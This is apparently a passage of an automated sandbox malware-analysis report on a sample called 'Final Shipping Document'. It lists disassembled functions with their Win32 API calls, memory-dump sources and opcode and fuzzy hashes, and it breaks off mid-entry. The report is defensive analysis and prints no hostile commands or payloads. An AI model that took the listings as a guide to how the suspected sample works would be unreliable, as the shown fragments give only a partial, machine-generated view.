                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: b91f20ba3d271aafd18b33b20d932ceb4232ba6567bcf07b63f5c88e0f37d320
                                                            • Instruction ID: 465ae430702812ac6423dd852e38a032985023cbd945223f83b3390c0184fcb5
                                                            • Opcode Fuzzy Hash: b91f20ba3d271aafd18b33b20d932ceb4232ba6567bcf07b63f5c88e0f37d320
                                                            • Instruction Fuzzy Hash: 5E216931E00108AFDB14DFA4C985BEEB7B8EF44354F084459E851AB281E731AA45DBA0
                                                            Function 00C32782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00C3280A
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C32824
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C32832
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C32840
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$AttributesLayered
                                                            • String ID:
                                                            • API String ID: 2169480361-0
                                                            • Opcode ID: 59ad1b82efc54d80cb7988d8c970b07ca76d0748fdc7320fe5edff90f000a1bc
                                                            • Instruction ID: f6943ed6cb8cb8e74753b45defa50bdd807a799a031c1af2f5fda361df7a4a13
                                                            • Opcode Fuzzy Hash: 59ad1b82efc54d80cb7988d8c970b07ca76d0748fdc7320fe5edff90f000a1bc
                                                            • Instruction Fuzzy Hash: 7421D332228111AFDB149B24C895FAA7B95FF46324F148158F4268B6E2C771FD82C791
                                                            Function 00C078F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C08D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C0790A,?,000000FF,?,00C08754,00000000,?,0000001C,?,?), ref: 00C08D8C
                                                              • Part of subcall function 00C08D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00C08DB2
                                                              • Part of subcall function 00C08D7D: lstrcmpiW.KERNEL32(00000000,?,00C0790A,?,000000FF,?,00C08754,00000000,?,0000001C,?,?), ref: 00C08DE3
                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C08754,00000000,?,0000001C,?,?,00000000), ref: 00C07923
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00C07949
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C08754,00000000,?,0000001C,?,?,00000000), ref: 00C07984
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: 03d8ec4c116693d385a8bf18ec89df812e271cb13ba84f17635b68ef1fe04513
                                                            • Instruction ID: 036f430289170e3178c43a05ef5b99fc5fb8f567bddf945a25400278e0570f42
                                                            • Opcode Fuzzy Hash: 03d8ec4c116693d385a8bf18ec89df812e271cb13ba84f17635b68ef1fe04513
                                                            • Instruction Fuzzy Hash: DF11063A200302ABCF156F34DC45E7E77A9FF45350B00412AF842C72A4EB31D911D7A1
                                                            Function 00C37CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C37D0B
                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00C37D2A
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C37D42
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C1B7AD,00000000), ref: 00C37D6B
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID:
                                                            • API String ID: 847901565-0
                                                            • Opcode ID: b49ce03331241c2a792d6e548d436e8aa3189f11156873c369901b3062a0b1d9
                                                            • Instruction ID: 914d4ebeb63152ef623ed7262d62a489cee38c533a10fceef9b0892cddfe0d23
                                                            • Opcode Fuzzy Hash: b49ce03331241c2a792d6e548d436e8aa3189f11156873c369901b3062a0b1d9
                                                            • Instruction Fuzzy Hash: 6E11DF72224654AFCB208F28CC04BAA3BA4AF453B0F258324FD39D72F0D7308A51DB40
                                                            Function 00C35660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 00C356BB
                                                            • _wcslen.LIBCMT ref: 00C356CD
                                                            • _wcslen.LIBCMT ref: 00C356D8
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C35816
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend_wcslen
                                                            • String ID:
                                                            • API String ID: 455545452-0
                                                            • Opcode ID: 5f83bc062c542861c8e645d9ffbd277a75cc0a38fa73708f99cc852d6b894ab5
                                                            • Instruction ID: bcd60e81419745a77166ab89adb6a4098cc9513ada2ce302c52970f1839e219e
                                                            • Opcode Fuzzy Hash: 5f83bc062c542861c8e645d9ffbd277a75cc0a38fa73708f99cc852d6b894ab5
                                                            • Instruction Fuzzy Hash: 0F11B1B16206189ADB20DF658C86BEE77BCAF11760F50406AF925D6181EB708B80CF64
                                                            Function 00C01A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C01A47
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A59
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A6F
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C01A8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 050af3e10a543b592f07ed3d59a445f24eb7956903b2c76e1e3e766eb9a7616d
                                                            • Instruction ID: 57961d7aec1394256abeabe10ff5804486d9bc5bf038ae1b6a6c40831c1c17ce
                                                            • Opcode Fuzzy Hash: 050af3e10a543b592f07ed3d59a445f24eb7956903b2c76e1e3e766eb9a7616d
                                                            • Instruction Fuzzy Hash: 4011F73AA01219FFEB119BA5CD85FADFB78EB08750F240091EA14B7290D6716F50EB94
                                                            Function 00C0E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00C0E1FD
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00C0E230
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C0E246
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C0E24D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 2880819207-0
                                                            • Opcode ID: 44c75edaaa2febe3055fe899ece7e5daf2cb950b20b12cc21b8fb77135674053
                                                            • Instruction ID: fcdb60e9f40711340f5460e1b142060804228063922daf3f146eea440bf6f1b9
                                                            • Opcode Fuzzy Hash: 44c75edaaa2febe3055fe899ece7e5daf2cb950b20b12cc21b8fb77135674053
                                                            • Instruction Fuzzy Hash: 5311C876904254BBC7019BAC9C49B9E7FAC9B45324F044669F924E32D1D670CA44C7A0
                                                            Function 00BCD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,?,00BCCFF9,00000000,00000004,00000000), ref: 00BCD218
                                                            • GetLastError.KERNEL32 ref: 00BCD224
                                                            • __dosmaperr.LIBCMT ref: 00BCD22B
                                                            • ResumeThread.KERNEL32(00000000), ref: 00BCD249
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                            • String ID:
                                                            • API String ID: 173952441-0
                                                            • Opcode ID: 28f15ff2a8e5e30287cf0f073ddf3d8f00d9a52db8e2b0884b4e7ca187236b76
                                                            • Instruction ID: 616595278a69d60f055009694e05547546e177fc8e3851d5b7a4d81a3b9d1e30
                                                            • Opcode Fuzzy Hash: 28f15ff2a8e5e30287cf0f073ddf3d8f00d9a52db8e2b0884b4e7ca187236b76
                                                            • Instruction Fuzzy Hash: DE01D67A4051047BC7115BA5DC49FAE7AEDDF81331F1002ADF925AA1E0DB70C901D7A0
                                                            Function 00BA600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BA604C
                                                            • GetStockObject.GDI32(00000011), ref: 00BA6060
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateMessageObjectSendStockWindow
                                                            • String ID:
                                                            • API String ID: 3970641297-0
                                                            • Opcode ID: 88cc219026a49f027aeece8a36279a3f6129530f1d5fe671fa19ab642fb9eb79
                                                            • Instruction ID: 505170ae86fbcb30247c9235bd58e2cf8ed8768269fa9bdb2e20225ef826aeff
                                                            • Opcode Fuzzy Hash: 88cc219026a49f027aeece8a36279a3f6129530f1d5fe671fa19ab642fb9eb79
                                                            • Instruction Fuzzy Hash: A61161B2505549BFEF264FA49C84FEE7BA9EF0A354F090155FA1452110D7329CA0EB90
                                                            Function 00BC3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00BC3B56
                                                              • Part of subcall function 00BC3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00BC3AD2
                                                              • Part of subcall function 00BC3AA3: ___AdjustPointer.LIBCMT ref: 00BC3AED
                                                            • _UnwindNestedFrames.LIBCMT ref: 00BC3B6B
                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00BC3B7C
                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00BC3BA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                            • String ID:
                                                            • API String ID: 737400349-0
                                                            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                            • Instruction ID: 9cd57fbded81cc45a84f9107489d06b73e5915930c558d470c172a5c4bcf4694
                                                            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                            • Instruction Fuzzy Hash: C3011732100148BBDF125E95CC42EEB7BEDEF58B54F448098FE4856121C732E9619BA0
                                                            Function 00BD3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BA13C6,00000000,00000000,?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue), ref: 00BD30A5
                                                            • GetLastError.KERNEL32(?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue,00C42290,FlsSetValue,00000000,00000364,?,00BD2E46), ref: 00BD30B1
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BD301A,00BA13C6,00000000,00000000,00000000,?,00BD328B,00000006,FlsSetValue,00C42290,FlsSetValue,00000000), ref: 00BD30BF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: e0ad2d46bc3e34f75249ba683c5bbc7a48e81dc130e8aa59de783ca87c37d832
                                                            • Instruction ID: 3844657a976c7a76db754bd295f8195f292a9e4745068593cc076d5609913e0d
                                                            • Opcode Fuzzy Hash: e0ad2d46bc3e34f75249ba683c5bbc7a48e81dc130e8aa59de783ca87c37d832
                                                            • Instruction Fuzzy Hash: 7701D436311222ABCB214A78AC84B5FBBD8EF05F61B240662F909F3242E721D901C7E1
                                                            Function 00C07464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C0747F
                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C07497
                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C074AC
                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C074CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: a3fc5e462275e39806ecf160ed55b41c607037c75e2688191f01d68b4b093142
                                                            • Instruction ID: 83418bb90f4861146e5286638e10f46c4b93d29b7d65cf66817ba4ae1d953ba0
                                                            • Opcode Fuzzy Hash: a3fc5e462275e39806ecf160ed55b41c607037c75e2688191f01d68b4b093142
                                                            • Instruction Fuzzy Hash: 2E11C4B5A053149FE7208F94DC48FAA7FFCEB00B00F108669A666D6191D7B0F944DF60
                                                            Function 00C0B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0C4
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0E9
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B0F3
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C0ACD3,?,00008000), ref: 00C0B126
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: a93d38b4faee127a171df01743514cfa5c56ba0cece8551efd8f7b332897e283
                                                            • Instruction ID: 418d68d1ed86753bbe163a4795936f45b58a11f62645bf22c1c81449d8efdcad
                                                            • Opcode Fuzzy Hash: a93d38b4faee127a171df01743514cfa5c56ba0cece8551efd8f7b332897e283
                                                            • Instruction Fuzzy Hash: 91113971C01928E7CF00EFA5E998BEEBB78FF19711F104085DA51B2181CB309A60DB91
                                                            Function 00BB990E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00BB98CC
                                                            • SetTextColor.GDI32(?,?), ref: 00BB98D6
                                                            • SetBkMode.GDI32(?,00000001), ref: 00BB98E9
                                                            • GetStockObject.GDI32(00000005), ref: 00BB98F1
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Color$LongModeObjectStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1860813098-0
                                                            • Opcode ID: 4b24206c40f967b7e1ee0692b8fbfb354aba643e1f2f40f9ebad956030a36136
                                                            • Instruction ID: 97ed17d70d1a1e0cc90f8b9e2cb4bd75c155870085e2483ecbf5f99e71a8551a
                                                            • Opcode Fuzzy Hash: 4b24206c40f967b7e1ee0692b8fbfb354aba643e1f2f40f9ebad956030a36136
                                                            • Instruction Fuzzy Hash: B50168336862109BC7128F25ECA5FFE3BA0DB66765B09009DF782DB2A1CBB54981C750
                                                            Function 00C02DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C02DC5
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C02DD6
                                                            • GetCurrentThreadId.KERNEL32 ref: 00C02DDD
                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C02DE4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: c9c52c2a7482a42d1d8b89ee3733b6db7c29eeb9a69e913ba47eb2e097670057
                                                            • Instruction ID: f6f4c6068fa098152cdf3f5f61360fa50b29884920f52dc2a281d1323378ca56
                                                            • Opcode Fuzzy Hash: c9c52c2a7482a42d1d8b89ee3733b6db7c29eeb9a69e913ba47eb2e097670057
                                                            • Instruction Fuzzy Hash: 23E01271511724BBDB201B739C8EFEF7E6CEF56BA1F400115F505E10909AA5C941D7B1
                                                            Function 00C38863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB9693
                                                              • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                              • Part of subcall function 00BB9639: BeginPath.GDI32(?), ref: 00BB96B9
                                                              • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C38887
                                                            • LineTo.GDI32(?,?,?), ref: 00C38894
